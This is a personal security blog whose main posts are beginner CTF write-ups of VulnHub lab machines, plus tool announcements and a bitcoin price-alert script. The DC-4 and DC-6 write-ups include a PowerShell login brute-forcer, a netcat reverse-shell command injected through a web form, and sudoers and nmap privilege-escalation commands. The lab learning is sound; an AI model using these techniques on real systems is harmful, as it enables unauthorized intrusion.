Miller Security Research

My Twitter Feed:

Let's Code! Bitcoin Price Notifier by Ben from 1 August 2020

So I am sure that all of you are as obsessed with bitcoin as I am lately? Right?

I am tired of constantly refreshing a browser window or my Cash App to see what the current price is. So I wrote a very simple notifier in powershell. I call this new script... Bitcoin Price Notifier. Gripping huh?

Every minute or so(you can totally change this timing) it goes out to the internet and gets the price of bitcoin. It then compares it to the price that it had previously. And since we are being lazy we don't want to just display that, no no, we want to hear it. It's better this way. We don't have to tab out of what we are doing. It just tells you that the price is either up or down, by how much, and what the current price is using a super sexy Microsoft Sam voice. Copy paste the code into a text editor and save it as a .ps1 file. Simply run this script by right clicking your new .ps1 file and selecting Run with Powershell. You could minimize the window or you could obsessively stair at the price updates... but I wouldn't. Now go about your life while getting soothing voice notifications about whether or not your money is burning up in server flames or building up into crypto millions.

Here is the code:

Add-Type -AssemblyName System.Speech
$Voice = New-Object System.Speech.Synthesis.SpeechSynthesizer

$Napalm = "https://millersecurityresearch.com/files/scripts/sounds/Napalm%20Death%20-%20You%20Suffer.mp3"
$Path = $Env:Temp + "\Napalm Death - You Suffer.mp3"
$Webclient = New-Object System.Net.WebClient
$Webclient.DownloadFile($Napalm, $Path)
Add-Type -AssemblyName presentationCore
$MediaPlayer = New-Object system.windows.media.mediaplayer
$MediaPlayer.open($Path)

$Response = Invoke-WebRequest -URI "https://api.coindesk.com/v1/bpi/currentprice.json" | ConvertFrom-Json
$StartingRate = $Response.bpi.USD.rate
Write-Host "Starting BTC: $StartingRate"

While (0 -lt 1){
    Start-Sleep -Seconds 60
    $Response = Invoke-WebRequest -URI "https://api.coindesk.com/v1/bpi/currentprice.json" | ConvertFrom-Json
    $CurrentRate = $Response.bpi.USD.rate
    If($StartingRate -gt $CurrentRate){
        $Difference = $StartingRate - $CurrentRate
        If($Difference -gt 25){
        $MediaPlayer.Play()
        }        
        $Voiceoutput = "Bitcoin Down by " + $Difference + " Dollars to " + $CurrentRate -replace ".{5}$"
        $Voice.Speak($Voiceoutput)
        Write-Host "Current BTC: $CurrentRate - Down"
    }
    If($StartingRate -lt $CurrentRate){
        $Difference = $StartingRate - $CurrentRate
        $Voiceoutput = "Bitcoin Up by" + $Difference + " Dollars to " + $CurrentRate -replace ".{5}$"
        $Voice.Speak($Voiceoutput)
        Write-Host "Current BTC: $CurrentRate - Up"
    }
    If($StartingRate -eq $CurrentRate){
        $VoicedRate = $CurrentRate -replace ".{5}$"
        $Voiceoutput = "Bitcoin same at " + $VoicedRate + " Dollars"
        $Voice.Speak($Voiceoutput)
        Write-Host "Current BTC: $CurrentRate"
    }
    $StartingRate = $CurrentRate
}

Pumpkin Raising. by Ben from 20 July 2019

Well, I worked on Pumpkin Raising, part two of the three part VMs series I was working through, for about a day and a half. I got really far. But, I started to get frustrated. I had gotten 1 of the "seeds" already. I found it in a hidden .pcap file. I had a gpg file to crack or figure out the password for. I was sure it contained another seed. And I had gotten a .gif image that was hidden in the code of one of the web pages. I was positive that it had another seed in it as well. I found a bunch of secret messages and decoded them. One secret message contained a bunch of what look liked credentials. None of them worked.

So the gpg file. I tried every combination of credential, secrets, and words that I could think of. I couldn't get the damn thing to unlock. I worked on this for like.. I don't know.. an hour. I was going to start a bruteforcer on it but I didn't know if I wanted to wait the weeks it could take to find the answer. I failed to open the file.

Next the pictures. I was sure that one of the pictures had a stenographic message in it. Again, I tried every combination of password and word I could think of. I used steghide and stegosuite. I tried every bit of tect from the secret messages I had been finding. I tried alot. I worked on this for about 2 hours or so. I thought again about bruteforcing it. There isn't any programs to do that but I could whip up a python script to do it I'm sure. I failed to extract any hidden messages from the photos.

I never found the location of the 4th seed myself. And this one hurts the most! Out of them all, this failure was the biggest. I just straight up didn't find it.

So this morning, I impulsively and foolishly looked up a walkthrough. I... was... so... close... FUCK!!! Why did I do this? Ooook, So first the gpg file, the password was just a combination of big bold ass words from one of the webpages... I should have tried more things before I gave up. I mean they were three big BOLD ass words. It did have a seed in it as well. Lesson learned; don't be a quitter! The .gif file. It WAS stenographicly encoded and DID have a secret message hidden with stegosuite in it as well. I was completely on the right track with this one. I'm sure I even tried the key that eventually unlocks the message. I just didn't get it for some reason. I was closer on this one that the gpg file fore sure. Lesson learned; don't be a damned quitter! Then seed four.. You bastard. Seed four is one that I think I learned the most from. Seed four was literally just down at the bottom of the source of one of the pages. I had no excuse not to have seen it. If I had just scrolled down.. to the bottom.. I would have seen it clear as day. Clearly, this is a super simple troll. But, I have to admit it got me. Lesson learned; observe your surroundings you big stupid idiot, and don't be such a fucking quitter.

Well with those failures under my belt, and the cheating already having taken place, there is literally no reason to finish the damned thing. I bowed my head in disgrace. Turned the VM off. Right clicked it. Selected remove. It asked what I would like to remove. I selected all files.

Tone in next time to hear about part 3; Pumpkin Festival. Let's see if I can apply the lessons learned from part 2 and finish this series without needing to go find answers.

I popped the PumpkinGarden! by Ben from 18 July 2019

This time I wanted to pop a box without cheating. I am not going to look up any answers at all. Let's do this! To start, I went back to VulnHub and got me a VM. I picked Mission-Pumpkin v1.0: Pumpkin Garden. The description states it is part one of a three VM series. So here we go. I start by doing a quick Zenmap of the network. The VM was given 192.168.1.105. I did an all ports scan on that IP. It came back as has having a 3 ports open. An FTP server on port 21 with anonymous logins enabled. A webserver on port 1515 and an SSH server running on port 3535.

I started with the FTP server. It had a note in it that said:



I think it is safe to assume that jack is a user we will encounter later. I wasn't able to login to the FTP server as that user though. Next I checked out the web server. It has a cutesy lil site on it. I checked out the code on the site. I noticed right away a comment in the code.



Clearly they want us to look at the images on the site to go forward. The code also reveals the images on the site are in an img/ directory. I look for these in webcode anyways because open web directories are my favorite source of pirated media. So I go to that. It has a good number of files and another directory that looks fairly juicy!



I downloaded all the images. I also look at the secret note. The secret note is nothing but a bunch of gibberish. Based on the note left in the website code I was sure these images where important. I have heard of steganography before. Steganography is were you hide a message in the data of am image. Then you can send that image in the clear without fear of adversaries knowing it has a message in it. It just looks like a cat.. or in this case a pumpkin. Kali doesn't have any steganography programs built in so I did a fast "apt install steghide stegosuite". That installed two tools Steghide and Stegosuite that are used to encode and decode steganographic messages. I fiddled with these for like an hour. I tried every picture with every combination of passwords I code think of. And I did this in both applications. Nothing yielded any results.

I started to look at the "clue.txt" text again. It was just garbage, but what if it was just encoded? I know with my work using Powershell that base64 is a really common encoding algorithm. So I googled a decoder, popped the text into it... and BAM! POO! POW! a set of credentials!!!



This set me in motion and the rest of the box only took about another 30 minutes. That set of creds let me SSH into the box as the scarecrow user. In that users home directory was a "note.txt" file.



That note then gave me the set of credentials needed to login as the "goblin" user. However, before I went I made sure that I couldn't run any commands as sudo and that I couldn't find any more interesting files. So I logged in as goblin and did a "sudo -l".



OH WOW! I can run any program except for /bin/su as root. You can tell this by the ! in front of /bin/su. There was also a note in the home folder. Checking that out give me the link to some exploit code that if ran as goblin would presumably escalate us up to root. However, since I can run anything as root I decided to revisit the technique I learned yesterday. I wasn't going to use their code at all. Instead I went about adding permissions to the sudoers file with tee. I checked to make sure that the box had tee on it. It does. Perfect. I simply add ALL ALL ALL permissions to my boy goblin. Do a fast "sudo -l" it states I have full permissions. So I "sudo su" up to root. Bingo Bango! Box popped!





I did my first box without looking up and answer! I feel accomplished.

DC-4. I still needed help. by Ben from 18 July 2019

I booted up DC-4 and got to the login screen. I tried the simple stuff like admin admin and admin password, you know for shits and giggles. It obviously didn't work. So I fired up Zenmap and found the box on the VM network. It can back as having an IP of 192.168.1.103 and it had ports 22 and 80 open. So I open up a web browser and go to the IP I get a super simple login page.

First things first, let's check out the code of this site. Looking it over, the code is very short and not very complicated. The page is a simple webform to submit a set of creds to a login.php script. Unfortunately, there is no way for me to view this script yet. Not without first being able to get past the authentication. I could bruteforce either one, I guess. In fact, I have scripts to brute force html forms and ssh servers that I have already made. So... that is the next thing that I decide to do. I fired up my Windows 10 developer VM. I then went to my website and visited my article titled “Let's Code! An HTTP/HTTPs Bruteforcer.". I copied the code from the final function and made a new script file on my Windows 10 VM. I pasted the function into it and went about editing it. I won't go into detail about what it does. That is what the other article is about. I added some outputs so I could see its progress and I modified the final conditional if to a condition that can only be met if the user is logged in, or so I think. Anyways, after some fiddling I got it working and set it on the task of brute forcing the password for the admin account. I don’t feel like the password will be super hard as this was a beginner box. Because of this I used a smaller word list that only contains english words. If it doesn't work I’ll try a bigger wordlist. Here is my script bruteforcing the logins.



It was taking a very long time. I suppose the script could be threaded to speed it up but I just let it continue on. It ran for more than 2 hours and only made it to the c’s… If I need to use a bigger list I am going to need to multithread this thing. For now I am going to let it run and come back after a while.

I stopped it. It was taking forever. I was staring at it, watching it run. And I realized that the first webrequest is inside the foreach loops. Meaningthe does 2 web requests every time. This is not optimal. I only need the first webrequest to get the form data and to get a session started. I don’t need to do it every time. So I stopped it. I edited it a lil. I chopped off the top of the wordlist, just to get me back to where I was already. And started it up again. This time it ran much faster! It had gotten through about 52k guesses before I stopped it. It ran for 3 hours, so that’s like 17k guesses an hour or 288 guesses a minute, give or take. That’s pretty good, I guess. I let this new edited one run for a decent period of time. I want to figure out the guesses per hour and minute now that it is only doing one webrequest per guess as opposed to two. So that we can compare them. After about 30 minutes-ish I did some basic numbers. The script was up to 30k guesses an hour or 490 guesses a minute. That is much better. Almost double! I guess that makes since as I did take away half the work each guess has to do. The wordlist I am using has 345k passwords left to geuss. So at 30k an hour at max this list will take another 11 hour to complete before it has exhausted all the english words. If that doesn’t give me something I will have to go back to the drawing board. I let it run.

Time Passes….

I googled some.. I may have seen an article that had the actual password in it. I did the math. It would take 3 hours to get to the password. I just went ahead and cheated. I chopped off the wordlist to a bit above the password. I ran the script… it went right past the password. It didn't stop. My stop condition was not valid. I would have let the entire thing run endlessly and it would have never worked. I logged in just to make sure that the password was correct. It was. I could easily edit my script to look for something on this page and stop when it sees it.. But without cheating I wouldn’t know anything about this page. So I decided to look for a way to determine that the page has changed and that the login was successful without knowing anything about the page beyond. I coded for like an hour.. But then found what I think the problem may have been. I think i may have been setting the field names incorrectly…. YEP!... fml…

Well these things happen. I should have re-read my own article. I would have caught this right off. But I didn’t. Just a few hours wasted. I re-ran the code with a condition to check for the length of the raw content. It stopped but one off from the actual password. So close. So I went back to an older condition to stop and gave it another go. Nope… I’m going backwards. Ok this time it stopped again.. But again one off from the actual password. Once I start to think about it I think this makes since. The session I am using is not logged in until I send the successful request. Then the subsequent request gets a different page because it's actually logged in. So how can I fix this? I tried a bunch of crap.. Nothing worked. The content length thing actually worked just one off.. So how can I fix that? Easy just put a last word variable in above the loops. Every loop it will update the word variable after it checks the condition. Then it will add the correct password to the output file buy just outputting the last password it tried before the loop stopped. That worked! I finally got the correct password using my script. I could have tried the passwords above and below the one it stopped on I guess but I don’t know if I would have done that in a real pentest. I am glad that I fixed my script to be able to find the password but I still knew what it was and was able to test it. With that knowledge I could have made a working script it just would have taken days to test every change. I would have given up on that. It wouldn’t be feasible. Here’s the final script. This will actually output the correct password if you have it in your wordlist.

	
function Http-Bruteforcer-C4 {
	Param
		(
		 [string] $PathtoUsernames,
		 [string] $PathtoPasswords,
		 [string] $PathtoOutput
		)
	
	$usernames = Get-Content $PathtoUsernames
	$passwords = Get-Content $PathtoPasswords
	$urlofserver = "http://192.168.1.103"
	$request = Invoke-WebRequest -Uri $urlofserver -SessionVariable ses
    $lastpassword = ''
			
	Foreach($username in $usernames)
		{
		Foreach ($password in $passwords)
			{
                
				$form = $request.Forms[0]
				$form.Fields["username"] = $username.ToString()
				$form.Fields["password"] = $password.ToString()	
                $url = $urlofserver + "/" + $form.Action
				$request2 = Invoke-WebRequest -Uri ($url) -WebSession $ses -Method POST -Body $form.Fields
               
                $write = 'Trying ' + $username + ' and ' + $password
                Write-Host $write
                
				If($request2.RawContentLength -ne 506)
				{					
					$output = $urlofserver + ", " + $username + ", " + $lastpassword
					$output	| Out-File -Append -FilePath $PathtoOutput	
                    break	
				}
                $lastpassword = $password
			}
		}
}

Http-Bruteforcer-C4 -PathtoUsernames 'C:\Users\IEUser\Desktop\dc4\users.txt' -PathtoPasswords 'C:\Users\IEUser\Desktop\dc4\english.txt' -PathtoOutput 'C:\Users\IEUser\Desktop\dc4\output.txt'

I am going to try this script again on the next box or machine in which I have to break a web form. This actually was a good lesson and reason to revisit my original script and for on it some. .

Turns out the wordlist I was using did have the correct password in it the entire time. So if I had used a tool that already exists I would have gotten it. So let’s do that just for posterity's sake. In the real world I would just be using pre-written tools anyways. I looked around and it looks like burp suite is what we wanna use for this. Kali has it built right in. Turns out the burp suite while easier to use… was just as slow if not slower. Actually.. It was like 50 tries per second slow. I stopped that right away.. Turns out my script is the way to go. I just need to keep in mind the new lessons that I have learned for next time. Even wasting the entire day like I did it still would have found the password faster than if I had fed the same list through burp suite. It would have found it though.

Let’s just move on now. So we can view the login.php now that we have found the password. I login to use the web browser. This shows me another simple page. I check over the code on that. It has a call to another php file called “command.php". I click that link and it loads up a another small page that displays some options. The new command.php page lets you list some files, run a disk usage command or run a command so see how much disk space is left. The output of these commands is just normal linux shell output. Looking at the code of the page I can see that the php code is submitting regular linux shell commands like “ls -l" to get the file list. Hence the regular shell output.



I bet I could send any command to this php page and have it run it. Let’s try. I am going to go back to my Windows 10 VM and fire powershell up again. I used the creds from before and the same type of web requests to submit a custom netcat command to start a reverse shell. On my Kali box I have a netcat listener running. Running the following bit of script actually does start a reverse shell!!!

$request = Invoke-WebRequest -Uri 'http://192.168.1.103' -SessionVariable ses
$form = $request.Forms[0]
$form.Fields["username"] = 'admin'
$form.Fields["password"] = 'happy'
$url = "http://192.168.1.103/" + $form.Action
$request2 = Invoke-WebRequest -Uri $url -WebSession $ses -Method POST -Body $form.Fields
$url = "http://192.168.1.103/command.php"
$request3 = Invoke-WebRequest -Uri $url -WebSession $ses
$form2 = $request3.Forms[0]
$form2.Fields["radio"] = 'nc 192.168.1.100 9999 -e /bin/bash'
$form2.Fields["submit"] = 'Run'
$request4 = Invoke-WebRequest -Uri $url -WebSession $ses -Method POST -Body $form2.Fields

Doing an ls on the home directory give us a list of users:

• charles
• jim
• sam

These could be used to bruteforce the SSH server. Looking into each of the folders I find that only Jim’s has any files in it. Conveniently for us in Jim’s backup folder there is a wordlist called old-passwords.bak. Luckily for me I already have a working SSH brute forcing script. Check out “Let's Code! An Ssh Bruteforcer." I also modified it a little bit to include some output and to exclude some errors it tosses out. I looked at the new wordlist that we got. It had duplicates in it. I used Notepad++ to sort the file then I used it to remove the consecutive duplicates. After that I went ahead and fed the usernames and passwords lists into my bruteforcer and let it run. It finished without any success. WTF… why doesn’t it work anymore? I don't know, it is getting late in the day now and I just wanna beat this box!. So I went ahead and fed the wordlist into Ncrack. A tool on Kali. It found the password for the user jim. It was “jibril04". I tried to SSH in. It worked! So now we are logged in as a local user!



Skip to the next morning, I had to start digging into my new user Jim. I couldn’t find any ways to escalate like before. Luckily I found this site which talks about how to find ways to escalate privileges on a linux machine. I made it to the useful commands to find credentials section. Using the commands from the site. I searched for any file that had the string “Password" in it. I found one! It lives in /var/mail/jim. It is a mail message of Jim sending a password to another user, Charles. I guess I should have been looking for something like this all along. Jim did have a “mbox" file in his home directory which was also an email message.

The creds we just found now allow me to switch to Charles. First thing I do as Charles is run “sudo -l" it turns out he has permissions to run a bin called “teehee" as root. Looking at the bin shows that it is a copy of the program tee, just renamed. I’ve never used tee before. Reading around it looks like its just for recording console outputs to a file. How can I use that to my advantage? Well the options do say that it can append the output to a file. I bet since we can run it as root we can output to any file on the system. I looked up the syntax to add user permissions to the sudoers file. If I can run anything as sudo then I’m root. My new plan is to add ALL ALL sudo permissions to a user I already have logged in, like Jim. I ran the following command: “echo “jim ALL=(ALL) ALL" | sudo teehee -a /etc/sudoers". It just gave me back the echo. I went over to the Jim console which was still logged. I typed in “sudo -l", it listed my permissions as ALL ALL! A quick “sudo su" and boom we are root. FINALLY! A root shell and the flag! Hot damn! It only took me 2 full days to figure this one out. I am more of a beginner than I thought I was. I gotta keep working at this.

My first box pop in 10 years. DC-6 by Ben from 17 July 2019

Tonight wanted to start my OSCP / pentesting practice. So, I go to Vulnhub and start scrolling through the list of VMs. I found a few that said they were for beginners and I downloaded them. I got DC-6, DC-4, and Sputnik. I started with DC-6 because it finished first. The VM information said that the interface would be set to DHCP and that I should add a host entry to my hosts file for the hostname of “wordy" for whatever IP the machine gets. It also said in the hints to run the following command: “cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt". This command tells me at least a little information. We are going to be cracking a password. The password is in the rockyou.txt (which is included in Kali). And it includes that string “k01" in the successful password. The cat command that we will run is looking at the rockyou.txt wordlist, piping it to grep and then grep is writing to a new file all the strings with “k01" in them. So we will have a new smaller list of passwords to use in our password cracking attempts.

I imported the OVA into VirtualBox. I changed the interface to be on the internal network (going through my pfsense box) VM network. Then I booted it up. This got me to a login screen. I couldn't do anything. I tried basic stuff like admin admin and admin password etc just for fun. It didn't work obviously. So fired up Kali and Zenmap. I gave the VM network a good old scanning. DC-6 showed up as 192.168.1.102. It said it had ports 22 and 80 open. Since I got the IP of 192.168.1.102 for this VM that's what I'll need to add to my hosts file. It now looks like this:



Using a web browser and just typing in “http://wordy" brought me to a WordPress blog.



I’m not ashamed to admit that this is where I hit a brick wall. I have never done this before after all. I really wasn’t sure which direction to go in. I went over the code of the WordPress site for a bit. I didn’t see anything particularly interesting. It looked like any other WordPress sites. I remembered back to the hints and went ahead and ran the command to prepare my wordlist. I figured I’d need it to break into this box.

So I started to google. I found this YouTube clip of a guys walkthrough of this box. It a new video put out by the user Moaz Ghawji. However, the video is in a foriegn language. But I am treating this like the tutorial level of a game and treating my foriegn friend in the video as my level guide. I know some may consider it cheating but again I’m treating it like more of a tutorial. I watch until the guy gets caught up with me. The next thing he does is run WPScan, a WordPress vulnerability scanner. He runs it to enumerate any possible users. So I do the same. We ran the following command “WPScan --url http://wordy -e". I get the following list of names:

• admin
• jens
• graham
• mark
• sarah

I really wish I knew more about how this command gets the usernames from the WordPress server. Possibly that is an article for another time. So we get this list of usernames. Now it’s time to crack on of them. Again using WPScan, we point it at a file containing the usernames and we also point it at the wordlist we created earlier. Then we let it go to work cracking the usernames and passwords by using the following command “WPScan --url https://wordy -U users.txt -P passwords.txt". After a few minutes I got the following output.



BOOM! We got one! I immediately want to log into the admin console of the WordPress instance. You do this by going to http://wordy/wp-login.php it is just a standard WordPress login page. And and and…. It let me in! We are at least into the WordPress now! So where do we go from here?

Looking at the Users tab showed me that the previous usernames were correct. So far I’ve learned about WPScan, a tool I didn’t even know existed. And I’ve learned that it can accurately enumerate WordPress users. As well as bruteforce WordPress login attempts. I also learned that these are legit over the wire login attempts.



So what next? Following the video as a guide, the next step is to find a way to escalate to a local machine user. Looking at the WordPress user panel we can see that they are using the activity monitor addon. Using a tool called searchsploit we can search to see if there are any known vulnerabilities in this plugin. And as it turns out there is:



This searches our local exploit database for any known exploits for the term activity monitor. After we find one, we then copy the html page to our desktop. After that we are going to go into the source and do some slight editing. In the source there is a line calling to localhost, we want to replace this with “wordy" as this instance is not running on our local host. We also need to edit a call to the local host IP and instead put in the IP of the “wordy" box.



From what I can tell the exploit works like this.. You run open the html from the exploit page and hit the submit button.That then sends a web request to the activity monitor. However, this webrequest also run a netcat command as well. That netcat command is our way in. We start a netcat listener on our Kali machine. The netcat command in the exploit will be ran on the web server and open a reverse shell back to our Kali machine. So I started a listener… ran the exploit in a browser.. BOOOOOMMM!!! My first reverse shell exploit completed!

So now that we have a shell who are we? We are now www-data, the user running the web server. What can we do? Well we can run any command that this user can run and we can access any files they can access. So let’s explore around a bit. In Mark’s home folder I found a folder called stuff. In Jen’s home folder I found a backup.sh script. Looking in Mark’s stuff folder I find a file called things-to-do.txt. It says the following:



That’s right. It contains another username and password in it! I tried to login to the WordPress portal with these creds. No dice! So let’s try them on the SSH server…. That’s it! They were SSH creds! So now we are in as an SSH user. I bet we won’t need our reverse shell anymore after this. Looking around as the “graham" user doesn’t really show me any more files that I can look at. Running the “sudo -l" command checks what permissions I do have on the system. We can see that the backup.sh script pops up again, this time it says it is a script that I can run.



Let’s go check out that script. It is just a script to zip up a file. Watching my foriegn video friend, he just puts /bin/bash at the end of it then runs the script as the user “jens" with the following command “sudo -u jens /home/jens/backups.sh". Since the script is getting ran as another user and since the script is just calling another shell, this allows us to now have a shell as the “jens" user. See how the username changes:



Running the same “sudo -l"command as jens shows that we can run the nmap program as root with no password as well. Until my foriegn teacher showed me… I had no idea the nmap contained a scripting function in it. We make a fast file containing an nmap script. Making the script is pretty easy just run the following command “echo “os.execute(‘/bin/bash’)" > /tmp/root.nse" all it will do is run nmap and then use it to open a bash terminal. Cool thing is if we run it as sudo we are now root. Looking into the root directory shows us the flag .txt file. Then we can cat the flag… and WE WON!



Really I wouldn’t have gotten very far without that video.. But I think we all need to start somewhere. I learned a lot about enumeration and privilege escalation. I also learned that I need to stick to it more and try more things out before I go running for a walkthrough. Warm up over. I’ll tackle DC-4 without help and see how far I can get… next time.

Getting a VM lab started by Ben from 10 July 2019

I want to start researching and learning the skills required for my OSCP. I think it would be pretty rad to get a job as a pentester and I personally know people who have gotten jobs with their OSCPs. I got some books to work through. I have done a bunch of reading and video watching. Now... Now it's time for some action! So, I am at a point where I am wanting to get a VM lab going.

I updated VirtualBox. Cleared out all my old VMs. Downloaded a fresh copy of pfSense, Kali, Windows 10, I am also downloading a number of isos from Vulnhub.

I setup the pfSense VM first. I configured the VM to have 2 interfaces. Interface one was natted to my host PCs nic and the second interface is set to internal. This will act as my router and gateway to internet. Mainly though, I want this because I am going to set up some rules before I start spinning up rando isos from the internet. I am going to try to make sure I don't have any routes into my home network or host PC. All other VMs will have their one network interface set to internal so that they will have to go through the pfSense VM for network access.

I got the Kali VM installed first. It was the first one finished downloading. Once I got Kali booted up I got into the pfSense box using its web browser and ran through the initial webconfigurator setup. I then shut them both down and made clone of the VMs and called them the "master clones". I will do this for every VM that takes any type of setup. These clones are the base installs without any modifications to mess them up. Why do this? In the past I have had problems with certain Linux VMs just blowing up after updating them. So, this Kali VM... Now that I have a master clone that I know is good I'll update the original. If the update completes successfully then I'll make another clone. I will then use that to work from. I am going to be making one clone per research instance. That way every time I start researching an iso or web service or w/e I will have a fresh up to date Kali with no old artifacts that may trip me up or confuse me.

Then I set to the task of updating Kali and installing Windows 10. I want to be able to use my own tools on as much of my research as possible. In-fact, I would like to write a tool for as many problems as I can. I know this is duplicating a lot of work but my end goal is knowledge and to broaden my personal understanding. I would like to be able to fully pentest a box using only self written tools by the end of this entire endeavor. I'm not saying before I get my OSCP. That's not realistic in my opinion. I saying just in general. So to circle back around. I am installing Windows 10 because the tools that I have written are all C# applications that work on Windows 10s and not Linux. I have gotten into python lately for some home security reasons but that's an article for another time. For now its C# and powershell where possible. You should check some of my tools out; for doing trace routes and monitoring hop latency I wrote the TraceMon tool. For scanning network IPs I give you Ping Scanner. Last but not least, I have Port Knocker. Guess what it does! With these tools I can start doing some very basic network enumeration and service mapping. I gotta start somewhere right?

That’s all I am going to do for tonight but I think it’s a decent start. I intend to put out regular updates as I move forward with more VMs and more start researching. Wish me luck!

Tool Drop! Time Keep by Ben from 7 February 2019

I find it hard to keep track of the amount of things I am doing all day long. Especially when I am at work clacking away at my keyboard with a vigor that only adult ADHD can possible muster.
I have to multitask a lot for work. I have to overlap meetings and tasks regularly. I have to switch gears and work on something new at a movements notice. I have to be track issues and outages all day some times. This makes it hard to properly keep track of time for the individual tasks I am doing. It makes planning resources for projects almost impossible as all my time is multi-use time.
So I bring to you my solution to this daily headache, Time Keep!


Updates

1.0.0.1 - Initial Release

To download Time Keep click here.

Tools Update! by Ben from 30 January 2019

Hey Team,
As I previously said. I moved back to Visual Studios. I have rebuilt all the apps using visual studios and as such have put out updates for all of. Now instead of being stand alone applications they are one click install applications which need to be install. This isn't bad though as it allows me to make fun start menu entries.

HiHoHiHo Its back to Visual Studios we go. by Ben from 13 January 2019

So... I have been trying SharpDevelop for some time to make my programs and such with. Why? Because I was trying to reduce my reliance on Microsoft when it come to development. Mainly I was concerned that if I ever become serious as a developer I think that Visual Studios is kinda expensive. I know that I can use the community version for free. But $1200 should I go pro is pretty steep IMHO. SharpDevelop, for what it is, is super great. It handles my crappy level of newbie programing just fine. It has almost all the features that I want. So what is the problem with SharpDevelop? Nothing, except that it hasn't been updated since 2016. I think it may be dead. I can't be releasing up to date software with an IDE that itself isn't up to date.

So Because of this, I am going back to Visual Studios. I mean, there really is now other options out there. Plus, I also would also like to dabble in game dev some. I would like to put out an Android game or two. For this I have downloaded Unity and will be trying my hand at some Android game dev.

Also, I am going to take this as an opportunity re-write all my applications and possibly rework their UI layout. I also want to fix a number of issues that I have found over time. Plus I think this would also be a good time to learn how to spool threads properly.

I had no idea. by Ben from 7 January 2019

I really had no idea that this was even a thing. Good read, quick primer on a subject that I think can probably go very deep.

Open redirects - the vulnerability class no one but attackers cares about from r/netsec

Yo Team! It's been a while. by Ben from 6 January 2019

Hey Guys, It's been a while since I have made any posts or updates to this site. Well, That's changing today. Instead of using social media for posting and sharing content with people I am instead going to move all my sharing and posting to this site or my other blogs depending on the interest. Check back regularly for more posts.

Why are you like this? by Ben from 30 Nov 2018

Internet... I have one question for you. Why are you still like this?

What could we as a society have to gain from this? Why are we still doing shit like this to ourselves? It makes me wonder. Why have you not moved on? Are you literally still running a pentium? Is this just like throw away virtual machines or are these legitimate boxes still running Windows XP? Is this just some wayward internet soul being puppetted around by some bot? Why are you still like this internet?

Tool Drop! TraceMON. by Ben from 14 Feb 2018

Hey Team! It's time for more free stuff! I have built a new tool called TraceMON. TraceMON is a route monitoring tool. Why would I need this you might ask? Because it can help you get to the bottom of many internet related issues, and I think it looks cool while its running. Many times one website will take a long time to load but others will load almost instantly. Why is this? Because the internet is global and the route your computer takes to reach one website might be totally different than the route it takes to reach another. This is where TraceMON comes in. Not only does TraceMON discover you route to a website, but TraceMON then monitors every single hop on the way continually so you can know exactly where the slowdown is. Wanna learn more?


To download the tool and get the full deatils click here.

It has been way to long! by Ben from 11 Feb 2018

It has been way way to long since I have made a post on this blog. Life sorta gets in the way sometimes and projects can slip to the side and become forgotten if we don't prioritize them. Well, I want to start prioritizing producing content for this blog again.

First things first, I switched from Visual Studios Community to SharpDevelop. I didn’t know if Microsoft would come after me or not for using their IDE to develop tools and code that I was giving away to people and businesses. Frankly, I am to lazy to look up, read, and understand their licensing around the community edition. So I switched to an open source alternative. SharpDevelop so far has been very easy to get the hang of and in many way is exactly the same as Visual Studios Community. I think the thing I like about it the most is how lightweight it is. However, one drawback I have found is that you have to build an installation package yourself, or you can have your apps function as standalone EXEs. Which is what I have opted to do for now. I think this will actually allow for more portability of the apps so I’m not sure if I really consider it a loss. Secondly, I have fully redone the Ping Scanner and the Port Knocker using SharpDevelop. I have also added a couple new features to each application. Check the update notes for each, as well as the updated source code!

Come on guys, this is getting old. by Ben from 31 Jan 2017

Just letting everyone know that I dont use myphpadmin.... Y'all can stop scanning for it.

I know this is just bots, but this is basically half of my damn webserver logs.

Tool Drop! Port Knocker. by Ben from 6 Jan 2017

It's been a while since I have been able to post anything. But I wanted to bring the new year in with a bit of style. So I give to you... free of charge... The Port Knocker.


To download the tool and get the full article click here.

Updating Tools and Programs! by Ben from 2 Jan 2017

So, anyone that develop programs that are distributed to other people runs into the problem of updates. How do you update a program on a computer controlled by someone? Or how do you let them know they need to update it? Well, I have updated the Ping Scanner to do just that! I will release an article in the future detailing how the code works. If you really cant take the suspense you can check out the source code of the Ping Scanner yourself.

How I hopefully secured a webcam to spy on my turtles. by Ben from 26 Oct 2016

I have 5 Red Eared Slider turtles or “RES" that I keep as pets. I like them a lot, and I have spent a good amount of time and money caring for them. They actually require quite a bit of things to care for them properly. After having spent all this energy and effort caring for them it kinda sucks to not be able to see them all the time. So I setup a webcam. However, I am security minded so I wanted to setup a cam in a secure way. I don't want to contribute to the current global crisis of webcam botnets destroying the internet. And I also would like to obscure my home IP as well so that hordes of the internet are one step removed from me.

Let’s first walk through the gear I used first. Then we can dive into how all the various things are configured. And lastly we can discuss some of the steps I have taken to secure this entire setup. The gear list is as follows.

• Raspberry Pi 2, Model B+
• Microsoft Webcam
• WiFi dongle
• Digital Ocean droplet
• That’s it.

To get the full story click here.

Tool Drop! Ping Scanner. by Ben from 9 Oct 2016

Keeping with the DIY nature of this entire endeavor I have made a tool called "Ping Scanner". Why call it exactly what it does? Because it have no imagination. What does it do? It simply sends pings out to a range of IP addresses you set and outputs their responses to a file. When attacking a company's public facing servers or after you're on a company's network, you need to have a way to determine what other machines are also online. That's what this tool will do.

To download the tool and get the full article click here.

Mystery flashdrives... An investigation. by Ben from 09 Sept 2016

This morning I was handed a stack of random thumbdrives and told “Five hundred of these showed up in the bosses office and we need to know if they are safe to use.". This is a new occurrence for me but I welcome the challenge. We’ve all heard about malicious USB sticks spreading viruses, so to me the threat is credible.

First thing I did was open one of these things up and take pictures of the USB chip. It has “TW218B1552AACB020" on the back of the chip itself. A bit of googling did not turn up any information about the chip itself based on this only real identifiable marker.
To get the full story click here.

Let's Code! An HTTP/HTTPs Bruteforcer. by Ben from 28 Aug 2016

Welcome back for another round of Let's Code! Last week we built an SSH Bruteforcer, so sticking with the bruteforcing theme we are going to make an HTTP/HTTPs bruteforcer. And since I am lazy, we are going to be reusing almost of all the code from last week. We are just going to modify it to work with HTTP/HTTPs login prompts. Here is the code that we will be reusing.

function HTTP-Bruteforcer {
	Param
		(
		 [string] $PathtoUsernames,
		 [string] $PathtoPasswords,
		 [string] $PathtoOutput
		)
	
	$usernames = Get-Content $PathtoUsernames
	$passwords = Get-Content $PathtoPasswords	
		
	Foreach ($urlofserver in $servers)
		{		
		Foreach($username in $usernames)
			{
			Foreach ($password in $passwords)
				{
				#This is where the login code goes
				}
			}	
		}
}

